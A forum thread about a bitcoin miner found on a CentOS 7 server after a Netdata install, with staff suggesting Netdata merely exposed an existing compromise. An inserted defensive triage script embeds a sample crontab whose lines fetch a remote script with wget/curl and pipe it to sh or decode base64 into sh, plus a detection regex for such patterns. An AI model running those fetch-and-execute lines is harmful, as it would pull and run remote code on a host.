Bitcoin miner installed after I enabled Netdata on a CentOS server

How is the install process of the files that go onto a server validated to be virus-free? After we installed the necessary files on the CentOS 7 server we wanted to test-monitor, we found that the next day the CPU went to 100%, and checking what was running we found a bitcoin miner was now on the server. Killing the process only stops it for one day, as the next day it is back again.

This does not give me a lot of faith in the security of your monitoring solution.

Dear John, there are (mainly) two alternatives for Netdata installation. One is through the binary packages, and the second (probably also your case) is through compiling the agent on the machine it is getting installed on. So it is highly unlikely that, following the recommended installation process, you could introduce another application through it.

In all cases the installation script is visible on your side, and you can examine it through your security forensic process. Without knowing all the details of your case, I would strongly recommend that you proceed with a thorough security forensic process; it seems more likely that by installing the Netdata agent you actually discovered that the CPU is being utilized by the bitcoin miner. Let us know how else we can help on the subject.
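Since the miner in the opening post comes back every day after being killed, and the reply above recommends a forensic pass, here is an added triage script. It is not Netdata's code and is not from any poster in this thread. It assumes a CentOS 7 host with cron, systemd and e2fsprogs (lsattr) available, uses a heuristic indicator regex that is an assumption rather than an authoritative IOC list, and embeds a constructed cron.d sample (198.51.100.7 is a documentation address, and the base64 string decodes to `echo hi`) so the detection part runs offline; `--live` walks the real persistence locations on the host it is run on.

```shell
#!/bin/sh
# Added triage helper (not part of Netdata or of any post in this thread).
# A process that is killed and returns the next day is almost always re-spawned
# by a scheduler. On CentOS 7 the usual places are cron (/etc/crontab,
# /etc/cron.d, /etc/cron.{hourly,daily}, /var/spool/cron), systemd timers and
# rc.local; miner droppers also like /etc/ld.so.preload and chattr +i.

# Heuristic indicators (assumption: illustrative, not exhaustive): scratch
# directories, "| sh" / "| bash", base64 decoding, known miner strings.
SUSPECT_RE='(/tmp/|/dev/shm/|/var/tmp/|\|[[:space:]]*(ba)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)|xmrig|stratum\+tcp|chmod[[:space:]]+\+x)'

# count_suspect_entries FILE...: number of non-comment lines matching SUSPECT_RE.
# Prints 0 (exit 0) when no file exists or nothing matches.
count_suspect_entries() {
    cat "$@" 2>/dev/null | grep -vE '^[[:space:]]*#' | grep -cE "$SUSPECT_RE" || true
}

# show_suspect_entries FILE...: print "file:lineno:entry" for each flagged line,
# skipping files that do not exist (unexpanded globs) and commented-out lines.
show_suspect_entries() {
    for f in "$@"; do
        [ -f "$f" ] || continue
        grep -nE "$SUSPECT_RE" "$f" 2>/dev/null \
            | grep -vE '^[0-9]+:[[:space:]]*#' \
            | sed "s|^|$f:|"
    done
    return 0
}

# write_sample_crontab PATH: constructed cron.d file (not from the thread) with one
# legitimate job and two dropper-style jobs, used to exercise the checks offline.
write_sample_crontab() {
    cat > "$1" <<'EOF'
# constructed sample: 198.51.100.7 is a documentation address, not a real host
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * root (wget -qO- http://198.51.100.7/x.sh || curl -fsSL http://198.51.100.7/x.sh) | sh
0 2 * * * root /bin/sh -c 'echo ZWNobyBoaQ== | base64 -d | sh'
EOF
}

# live_persistence_scan: run as root on the suspect host. Read-only; it lists the
# places a daily re-spawn usually hides so the evidence can be preserved first.
live_persistence_scan() {
    echo "== top CPU consumers =="
    ps -eo pid,ppid,user,pcpu,etime,cmd --sort=-pcpu | head -n 8
    echo "== flagged cron entries =="
    show_suspect_entries /etc/crontab /etc/cron.d/* /etc/cron.hourly/* \
        /etc/cron.daily/* /var/spool/cron/*
    echo "== systemd timers =="
    systemctl list-timers --all --no-pager 2>/dev/null
    echo "== unit files changed in the last 30 days =="
    find /etc/systemd/system /usr/lib/systemd/system -type f -mtime -30 2>/dev/null
    echo "== rc.local and ld.so.preload =="
    for f in /etc/rc.d/rc.local /etc/rc.local /etc/ld.so.preload; do
        [ -s "$f" ] && { echo "-- $f"; cat "$f"; }
    done
    echo "== immutable (chattr +i) files in common drop locations =="
    lsattr -R /tmp /var/tmp /dev/shm /etc/cron.d 2>/dev/null \
        | grep -E '^[^ ]*i[^ ]* ' || echo "(none)"
    return 0
}

# Usage: sh triage.sh --live   (as root, on the affected server)
if [ "${1:-}" = "--live" ]; then
    live_persistence_scan
fi
```

Killing the miner without removing the scheduler entry that re-spawns it is exactly why it returns the next day; copy any flagged file (and the binary it launches) somewhere safe before deleting it, so the root cause can still be traced.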

Hey @johng and welcome to our community.

I would have really preferred if the welcome was under better circumstances, but that’s life.

Given that Netdata is being downloaded hundreds of thousands of times per day without any relevant incident and that we are a VC-backed company, I think that George's insight is probably right.

In essence, not only could Netdata not have installed such a miner, but it's probably the reason you discovered it in the first place.

I am sorry that you have to manage such a security incident and I do hope to root-cause it.

If you need any further help, please don’t hesitate to reach out!

Thanks for the quick response George. We had been manually monitoring this server since we created it over 12 months ago and we did not see any abnormal CPU behavior. But let me do a log check to see what we can find.

Regards
John

Thanks for the welcome @OdysLam. We will do the install analysis and see what we can find.

@johng hi!

After we installed the necessary files on the CentOS 7

How did you install Netdata Agent? What are those necessary files?

Hi @ilyam8, we just did the standard install following the Netdata guide, so whatever files needed to be installed came from there. We did not install any files from our side. I just spoke with the team and they are going to go through the logs. We are installing ClamAV on the server today as an added precaution.
